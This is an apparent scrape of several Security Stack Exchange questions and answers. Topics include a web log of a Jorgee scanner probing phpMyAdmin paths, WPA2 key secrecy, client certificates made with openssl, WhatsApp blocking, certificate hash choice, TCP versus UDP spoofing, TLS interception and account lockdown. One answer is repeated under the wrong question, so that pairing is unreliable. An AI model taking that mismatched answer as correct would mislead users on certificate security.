46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmanager/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
139.x.x.135 - - [17/Jul/2017:06:33:53 +0000] "GET / HTTP/1.1" 302 219 "-" "Mozilla/5.0 (Windows NT 10.0; W0W64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-"
91.x.x.3 - - [17/Jul/2017:06:49:13 +0000] "GET / HTTP/1.0" 301 185 "-" "-" "-"
38.x.x.164 - - [17/Jul/2017:06:54:55 +0000] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 zgrab/0.x" "-"
91.x.x.3 - - [17/Jul/2017:07:48:04 +0000] "GET / HTTP/1.0" 301 185 "-" "-" "-"
139.x.x.204 - - [17/Jul/2017:08:19:50 +0000] "GET / HTTP/1.1" 302 219 "-" "Mozilla/5.0 (Windows NT 10.0; W0W64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-"
139.x.x.204 - - [17/Jul/2017:08:19:50 +0000] "GET /login HTTP/1.1" 301 185 "-" "Go-http-client/1.1" "-"
139.x.x.204 - - [17/Jul/2017:08:19:51 +0000] "GET /login HTTP/1.1" 200 2222 "http://x.x.71.1/login" "Go-http-client/1.1" "-" (Screenshot omitted.) I suspected an attack, since we don't have any of these paths. However, the last one says /login. Now I'm paranoid and wondering what I could do. Are there any post-attack motions you go through? How could I see if the perpetrator successfully logged in? Who is Jorgee? | Since you have the logs, I suggest that you look for usage of the login form. Did they try to log in at all? Most often this is just a scan that looks for interesting sites and stores them for later use. This behaviour is extremely common and is commonplace in almost every HTTP log of an internet-facing web service. First of all, you should look at the web logs and see if they actually tried to use the login form at all. If they did, I assume there is some logging done in the web application for that login form? In the log you posted there are only GET requests. Look for POST requests. Jorgee is part of the user-agent field and is easily customisable by the web client. | {
"source": [
"https://security.stackexchange.com/questions/165338",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/153532/"
]
} |
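Following the advice above, the quickest check is to search the access log for POST requests to the login endpoint. A small Python sketch along those lines; the log path and the combined log format are assumptions, so adjust them to the actual nginx configuration.

    import re

    # Typical nginx "combined"-style access log line:
    # IP - - [time] "METHOD /path HTTP/x.y" status size "referer" "user-agent" ...
    LINE_RE = re.compile(
        r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
        r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
    )

    def login_post_attempts(path="/var/log/nginx/access.log"):
        hits = []
        with open(path, encoding="utf-8", errors="replace") as f:
            for line in f:
                m = LINE_RE.match(line)
                if not m:
                    continue
                # A POST to the login endpoint is what indicates an actual login attempt.
                if m.group("method") == "POST" and m.group("path").startswith("/login"):
                    hits.append((m.group("ip"), m.group("time"), m.group("status")))
        return hits

    if __name__ == "__main__":
        for ip, when, status in login_post_attempts():
            print(f"{when}  {ip}  -> HTTP {status}")

An empty result supports the "just a scanner" interpretation; any hits are worth correlating with the web application's own login logs.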
165,342 | In short: I am working on a project in which several IoT devices are connected to a hotspot protected by a WPA2 password and MAC filtering. Can the communication in this network be leaked, since I do not use TLS? I do not want to use TLS, since the resources of my IoT devices are really limited and implementing TLS would occupy much of them. Therefore, I want to create a private WiFi network, with WPA2 password protection and MAC address filtering, so I can ensure that only devices that I allow are connected. The only question in my mind is: can the information sent over this network be stolen? Does password protection only stop foreign devices from joining the network, or does it encrypt the data as well? PS: My private WiFi network has no internet connection, it's just Access Point + IoT devices. | Although messages sent over wi-fi are encrypted with a session key, a device that already knows the pre-shared key can decipher the traffic. WPA doesn't implement forward secrecy; therefore, anyone who owns the pre-shared key can decrypt all the traffic that is not encrypted by upper OSI layer protocols (say, TLS). Therefore, when transferring sensitive data you should use an external data protection mechanism - for example, TLS. | {
"source": [
"https://security.stackexchange.com/questions/165342",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94078/"
]
} |
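To make the point about the pre-shared key concrete: in WPA2-PSK the pairwise master key is derived deterministically from the passphrase and the SSID, so every device that knows the passphrase can compute it (and, after observing a 4-way handshake, derive the per-session keys). A minimal sketch of that derivation using only the Python standard library; the passphrase and SSID are made-up examples.

    import hashlib

    def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
        # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)

    if __name__ == "__main__":
        pmk = wpa2_pmk("correct horse battery staple", "MyIoTNetwork")
        print(pmk.hex())
        # Every device holding the same passphrase and SSID computes exactly the
        # same PMK, which is why WPA2-PSK offers no confidentiality between
        # devices on the same network.

This is the reason the answer recommends an additional protection layer such as TLS for sensitive data, even on a closed network.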
165,343 | I am a software developer but a newbie when it comes to online security. Company A has some desktop software used by customers C and D (C unrelated to D). Company B has a web service and has the same C & D customers. C & D need A's software to connect to B's web service and import their specific data. A contacts B and asks what is required to achieve this and is told to do the following:
1) Create a private key - openssl genrsa -aes256 -out chosencertificatename.key.pem 2048 - (add a password when prompted)
2) Create a CSR - openssl req -key chosencertificatename.pem -new -sha256 -out chosencertificatename.csr.pem - (enter relevant information for the certificate)
3) Send the CSR to B and get a certificate back - You will be issued with a valid certificate for accessing the APIs. - The certificate chain used to sign the request will also be issued.
4) Associate with your private key using a PKCS12 file - openssl pkcs12 -export -out your_pkcs12_file.p12 -inkey your_private_key_store.pem -in certificate_sent_from_nucleus.pem
5) Use in your application - Embed the certificate in your application - Each request must contain the Client (X509?) certificate - Each request must also contain an X-USERNAME header to identify the customer (C and D will be given their own username tokens - plaintext ID?)
I am not sure this seems secure, since it seems to me that the certificate can only identify that A's software generated the request; the X-USERNAME header seems to just identify whose data to return - if C finds out D's X-USERNAME then they can access D's data, which seems even less secure than userID/password. Also, is it safe to pass around a certificate that has a private key embedded in it? Edit: Rereading the instructions sent by B, it appears that A also needs to inform B which customers require access, the reason being that B can write to those customers confirming their permission to access data via the API. Could it be that the certificate returned by B contains an embedded list of the validated X-USERNAMES? | Although messages sent over wi-fi are encrypted with a session key, a device that already knows the pre-shared key can decipher the traffic. WPA doesn't implement forward secrecy; therefore, anyone who owns the pre-shared key can decrypt all the traffic that is not encrypted by upper OSI layer protocols (say, TLS). Therefore, when transferring sensitive data you should use an external data protection mechanism - for example, TLS. | {
"source": [
"https://security.stackexchange.com/questions/165343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/153536/"
]
} |
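For reference, steps 1 and 2 of the procedure quoted in the question (generate an RSA key, then a CSR signed with SHA-256) can also be done programmatically. A rough Python equivalent using the cryptography package; the file names, the key password, and the subject fields are placeholders mirroring the openssl commands above, not values prescribed by company B.

    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography import x509
    from cryptography.x509.oid import NameOID

    # Step 1: 2048-bit RSA private key, stored encrypted with a password.
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    with open("chosencertificatename.key.pem", "wb") as f:
        f.write(key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.BestAvailableEncryption(b"change-me"),
        ))

    # Step 2: certificate signing request, signed with SHA-256.
    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, "client.example.com"),
            x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Company A"),
        ]))
        .sign(key, hashes.SHA256())
    )
    with open("chosencertificatename.csr.pem", "wb") as f:
        f.write(csr.public_bytes(serialization.Encoding.PEM))

The CSR contains only the public key and subject information; the private key never leaves the machine that generated it, which is the point of the CSR workflow described in the question.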
165,543 | There are currently media reports that the Chinese government are blocking some types of messages sent via WhatsApp ("pictures, voice messages and video"). Given that WhatsApp traffic has end-to-end encryption, what mechanisms is it likely that the Chinese government could be using to do this? | Given that Whatsapp traffic has end-to-end encryption, ... End-to-end encryption neither implies anonymity nor that the underlying protocol is unrecognizable to an eavesdropper and doesn't reveal any meta information at all. In fact, obscuring protocols to hide them from firewalls is notoriously difficult and finding out enough to block the traffic can be fairly easy. In the case of WhatsApp, it's also irrelevant that E2EE is used, because WhatsApp adds an extra layer of encryption between client and WhatsApp servers anyway (formerly via TLS, now Noise Pipes ). So the fact that users additionally get E2EE via the Signal protocol has limited impact on traffic analysis. There are some obvious ways to block WhatsApp traffic without having to bother with encryption: Block the servers. WhatsApp publishes the IP pool of their messaging servers. (The IPs used to be listed here and have since been moved to the Facebook Mobile Partner Portal .) But even without a ready-made list of IPs it would be fairly easy to reverse-engineer a list of servers by just using the app and observing the traffic. (That's an entirely common technique - similarly, the Tor network has suffered in the past years from China blocking the majority of their public relays.) Block the protocol. The government could use heuristics to recognize and block the transport protocol. Blocking based on traffic patterns has worked in the past for BitTorrent, Tor and others but might come with a notable overhead. (I can't comment on whether this approach is practical.) One way to block media files in particular would be by identifying large uploads. It might also come in handy that WhatsApp doesn't send images the same way as ordinary text. Instead, clients encrypt and upload attachments separately and then just send a message containing the key to the upload. Since the news report states that no files could be sent at all, it's plausible that the government just temporarily blocked the attachment upload servers (which would leave plain messages unaffected). The process for sending attachments is detailed in the WhatsApp Security Whitepaper : Transmitting Media and Other
Attachments

Large attachments of any type (video, audio, images, or files) are also end-to-end encrypted:

1. The WhatsApp user sending a message ("sender") generates an ephemeral 32 byte AES256 key, and an ephemeral 32 byte HMAC-SHA256 key.
2. The sender encrypts the attachment with the AES256 key in CBC mode with a random IV, then appends a MAC of the ciphertext using HMAC-SHA256.
3. The sender uploads the encrypted attachment to a blob store.
4. The sender transmits a normal encrypted message to the recipient that contains the encryption key, the HMAC key, a SHA256 hash of the encrypted blob, and a pointer to the blob in the blob store.
5. The recipient decrypts the message, retrieves the encrypted blob from the blob store, verifies the SHA256 hash of it, verifies the MAC, and decrypts the plaintext. | {
"source": [
"https://security.stackexchange.com/questions/165543",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
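A rough Python sketch of the encrypt-then-MAC attachment scheme quoted from the whitepaper, using the cryptography package. This only mirrors the sender-side steps to show that the blob store never sees usable plaintext; details such as IV placement and how the keys are transported are simplified assumptions for illustration.

    import os
    import hmac
    import hashlib
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from cryptography.hazmat.primitives import padding

    def encrypt_attachment(plaintext: bytes):
        enc_key = os.urandom(32)    # ephemeral AES-256 key
        mac_key = os.urandom(32)    # ephemeral HMAC-SHA256 key
        iv = os.urandom(16)         # random IV for CBC mode

        padder = padding.PKCS7(128).padder()
        padded = padder.update(plaintext) + padder.finalize()

        encryptor = Cipher(algorithms.AES(enc_key), modes.CBC(iv)).encryptor()
        # Prepending the IV to the ciphertext is an assumption of this sketch.
        ciphertext = iv + encryptor.update(padded) + encryptor.finalize()

        # MAC over the ciphertext (encrypt-then-MAC), appended to form the blob.
        tag = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
        blob = ciphertext + tag

        # The sender would upload `blob` and send (enc_key, mac_key,
        # sha256(blob), pointer) inside a normal end-to-end encrypted message.
        return blob, enc_key, mac_key, hashlib.sha256(blob).digest()

Blocking the upload servers therefore stops attachments without ever needing to break this encryption, which is consistent with the reported behaviour of plain messages still going through.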
165,559 | I'm looking to renew an SSL (okay, TLS) wildcard certificate with a well-known service. I need to provide a CSR, which I have created using a 2048-bit key. I also need to choose a signature hash. The service offers three choices: SHA-256 , SHA-384 , and SHA-512 . Of these, SHA-256 is the default. This confuses me. Isn't a longer hash presumed to be always stronger? Is there a good reason I might want the smaller 256-bit signature hash over the larger 512 or is this likely just a UI mistake? Are there some applications that can't use 512 bit hashes yet? | From a security perspective, it would be pretty pointless. In practical terms, SHA-256 is just as secure as SHA-384 or SHA-512. We can't produce collisions in any of them with current or foreseeable technology, so the security you get is identical. From a non-security perspective, the reasons to choose SHA-256 over the longer digests are more easily apparent: it's smaller, requiring less bandwidth to store and transmit, less memory and in many cases less processing power to compute. (There are cases where SHA-512 is faster and more efficient.) Third, there are likely compatibility issues. Since virtually no one uses certs with SHA-384 or SHA-512, you're far more likely to run into systems that don't understand them. There are probably fewer issues now than in the past, but again, you're buying yourself risk for no gain. So, at the present time, there are no clear advantages to choosing SHA-384 or SHA-512, but there are obvious disadvantages. This is why SHA-256 is the universal choice for modern certs for websites. | {
"source": [
"https://security.stackexchange.com/questions/165559",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3594/"
]
} |
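The practical differences the answer points to (digest size, and therefore signature and transmission overhead, rather than collision resistance) are easy to see with Python's standard library:

    import hashlib

    msg = b"tbsCertificate bytes would go here"

    for name in ("sha256", "sha384", "sha512"):
        digest = hashlib.new(name, msg).digest()
        print(f"{name}: {len(digest) * 8} bits ({len(digest)} bytes)")

    # Output:
    # sha256: 256 bits (32 bytes)
    # sha384: 384 bits (48 bytes)
    # sha512: 512 bits (64 bytes)

All three digests are far beyond the reach of brute-force collision searches today, so the extra bytes buy no practical security margin, only larger signatures and more compatibility risk.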
165,626 | While reading MS SDL (Microsoft Security Development Lifecycle) presentations I found a recommendation to replace UDP with TCP in applications because TCP is more secure than UDP. But both of them are only transport-layer protocols, nothing more. So why is TCP more secure than UDP? | To send data to an application using TCP, you first have to establish a connection. Until the connection is established, packets only get to the OS layer, not the application. Establishing a connection requires that packets get back to the initiating end. If you wanted to forge an IP address not on your own network and establish a TCP connection, you'd need to be able to intercept the packets the other side sent out. (You need to be "in between" the endpoint and where the packets to the forged IP address would normally go, or do some other clever routing tricks.) UDP has no connection, so you can forge a packet with an arbitrary IP address and it should get to the application. You still won't get packets back unless you're in the right "place", of course. Whether this matters or not depends on the security you put in the application. If you were to trust certain IP addresses more than others inside the application, this may be a problem. So in that sense, TCP is more "secure" than UDP. Depending on the application, this may or may not be relevant to security. In and of itself it's not a good reason to replace UDP with TCP, since there are other tradeoffs involved between the two protocols. | {
"source": [
"https://security.stackexchange.com/questions/165626",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122176/"
]
} |
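The difference described above shows up directly in the socket API: a UDP socket hands every incoming datagram straight to the application, along with whatever source address the packet claims, while a TCP socket only delivers data after the three-way handshake has completed, which a blindly spoofed source address cannot finish. A minimal Python sketch of the two receive paths (the port numbers are arbitrary, and each server is meant to be run on its own):

    import socket

    # UDP: no connection; recvfrom() reports the (easily forgeable) source address.
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind(("0.0.0.0", 9999))
    data, addr = udp.recvfrom(2048)   # any host that can route a packet here reaches the app
    print("UDP datagram from", addr, data)

    # TCP: accept() only returns once a full handshake has taken place, so the
    # peer must have actually received our SYN-ACK at the address it claimed.
    tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp.bind(("0.0.0.0", 9998))
    tcp.listen()
    conn, addr = tcp.accept()
    print("TCP connection from", addr, conn.recv(2048))

If the application makes trust decisions based on addr, the UDP version is the one that can be fooled by a spoofed packet.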
165,649 | After installing Firefox 54.0.1 on my work laptop, the first page I see warns me that "Your connection is not secure" when opening https://www.mozilla.org/. "The owner of Firefox has configured their website improperly" After browsing a bit more, I noticed that Firefox wasn't just reporting errors for Mozilla. Firefox is reporting HTTPS security errors for Google, Microsoft, Dropbox, GitHub, Wikipedia, LastPass, Netflix, Facebook, Twitter, Skype, WhatsApp, WolframAlpha, Amazon, LinkedIn, AutoHotkey, Yahoo, Imgur, and even Stack Exchange. There are a few things worth noting about these errors.
- Neither Google Chrome 59.0.3071.115 nor Internet Explorer 10.0.9200.22139 reports security issues on any of the listed websites.
- A select few sites load in Firefox without reporting any security errors, including Discover, Visa, Mastercard, Chase, American Express, Citibank, Capital One, Bank of America, PayPal, Stripe, Intuit, TreasuryDirect, iCloud*, Discord, and YouTube. (Concerningly, a majority of the sites which load without reporting any security errors are related to online banking and finance.)
- I am able to load Mozilla's support page and Wells Fargo without security errors, but the pages render as text without any images or formatting.
It's worth restating that these security errors are happening on a work-issued laptop, meaning that my employer is most likely scanning HTTPS traffic. While HTTPS scanning can at least partially explain the HTTPS security errors, the situation still leaves me with a few questions.
- Why is Firefox the only browser reporting these security errors?
- Why isn't Firefox reporting security errors on banking and financial websites?
- Why do some pages not report security errors, but only load as plain text?
*Note: While iCloud did not report any security errors, the page did eventually fail to load with a connection error. | There is a lot to unpack so I'll do my best here (based on some assumptions). Firefox maintains its own certificate store, which is likely the reason only Firefox is throwing these errors. Traditionally, SysAdmins will push out certificates through Group Policy, which works for both Chrome and IE/Edge, but Firefox won't trust certificates deployed that way. I would imagine that your traffic is being intercepted by a transparent proxy server which is inspecting your traffic (note that looking at the certificate information will reveal whether or not this is a certificate that your work has pushed out). Assuming again, but your work is probably explicitly not filtering financial website traffic, presumably to avoid any potential liability in doing so. I have no idea why some pages load as plain text; this might have something to do with the proxying process. EDIT: As Arminius astutely pointed out, pages loading as plain text is likely due to certificate errors happening with resources being pulled from third-party domains. It is likely that the images and CSS are not loading because the cert errors from those domains prevent the resources from being transmitted. | {
"source": [
"https://security.stackexchange.com/questions/165649",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141087/"
]
} |
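One way to confirm the interception suspected above is to look at who issued the certificate the client is actually being shown. A small Python check, meant to be run from the affected machine; the host names are just examples, and the third-party cryptography package is assumed to be installed.

    import socket
    import ssl
    from cryptography import x509  # assumed installed: pip install cryptography

    def issuer_of(host, port=443):
        ctx = ssl.create_default_context()
        # Verification is disabled on purpose: we want to see the certificate even
        # when it chains to a corporate CA that this client does not trust.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with socket.create_connection((host, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                der = tls.getpeercert(binary_form=True)
        return x509.load_der_x509_certificate(der).issuer.rfc4514_string()

    if __name__ == "__main__":
        for host in ("www.mozilla.org", "www.google.com", "www.chase.com"):
            print(host, "->", issuer_of(host))
        # A public CA (DigiCert, Let's Encrypt, ...) suggests direct traffic;
        # a company-named CA suggests a TLS-inspecting proxy on that route.

Comparing the issuer for an "erroring" site with the issuer for a banking site that loads cleanly would also show whether financial traffic is being exempted from inspection.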
165,964 | Intro: I have a free mail account on this (German) website. If I type my password wrong I get, once successfully logged in, a message telling me about my failed log-in attempt. Problem: Recently I noticed that from day to day the site notifies me of numerous failed log-in attempts (between 8 and 32). There is no feature like in Gmail, where the location and device of the failed log-in are recorded, so I am a bit in the dark. And also quite worried. Question: I have changed my password every day for four days now. Immediately closing the account is not an option, since I still have to compile a list of where this mail address is used. What appropriate steps should be taken to secure my account at this point? Update: The log-in attempts have declined over the last three days, maxing out at around ten altogether. Yesterday there was no failed log-in attempt logged. Nevertheless, I followed many of your suggestions and
- contacted GMX support, but have not heard back from them (certainly not using their 3€/min rip-off hotline)
- started using a password manager
- created easy-to-remember-but-hard-to-guess passwords
- started forwarding mails from the affected account to a safer mail service
- learned about 2FA
- wrote down all the sites and services the affected address is used with, in order to swiftly be able to close my account
Since there are many good answers I will wait a few days and mark the one with the most up-votes as the final answer. Thanks for your help! | As far as I can tell, GMX does not currently offer 2FA. That is unfortunate, but not necessarily catastrophic. Do you have to use the address to send e-mail? If not, you might be able to get around the problem by just forwarding incoming mail to another account, preferably one with 2FA enabled. After you set up a forwarding rule, you can put a really, really long and secure password (50+ chars) on the account and save it somewhere safe. Otherwise you'll probably have no real chance to secure the account itself. You are currently using passwords with a length greater than 20 chars, I hope? If not, start doing so immediately. Use a password safe so you don't have to memorize them. Also, please get the GMX security team involved. Probably it's just skiddies or bots (I had an attack like that on an old address I don't use anymore), but if not, they might be thankful for a hint. Note that I mentioned using a long password and not one drawing from a large character set. The complexity of the character set does not by itself make your password better. Length runs circles around complexity while juggling chainsaws. See this relevant xkcd comic for a visual explanation. | {
"source": [
"https://security.stackexchange.com/questions/165964",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/155192/"
]
} |
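The "length beats complexity" claim in the answer above is just arithmetic over the search space: an attacker has to cover on the order of charset_size ** length guesses, so adding characters grows the work factor much faster than enlarging the alphabet. A short illustration, plus a generator for long random passwords, using only the Python standard library (the lengths and alphabets are example choices):

    import math
    import secrets
    import string

    def entropy_bits(charset_size: int, length: int) -> float:
        # log2 of the number of equally likely passwords of this shape
        return length * math.log2(charset_size)

    print(entropy_bits(94, 8))    # ~52 bits: 8 chars from the full printable ASCII set
    print(entropy_bits(26, 20))   # ~94 bits: 20 lowercase letters already beats it
    print(entropy_bits(62, 50))   # ~298 bits: the kind of 50+ char value the answer suggests

    def random_password(length: int = 50) -> str:
        alphabet = string.ascii_letters + string.digits
        return "".join(secrets.choice(alphabet) for _ in range(length))

    print(random_password())

These figures assume the password is generated randomly; a human-chosen 20-character phrase has less entropy than the formula suggests, which is another reason to let a password manager do the generating.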